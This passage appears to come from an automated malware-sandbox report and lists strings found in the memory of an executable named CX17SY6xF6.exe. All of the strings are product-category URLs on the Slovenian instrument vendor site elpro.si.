                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/bimetalni-termometri/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/i
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/o
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/p
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/t
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-temperature/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/dodatni-izdelki-in-dodatki-za-nivo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/nivojska-stikala-wika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/prikazovalniki-nivoja/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/sila/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/
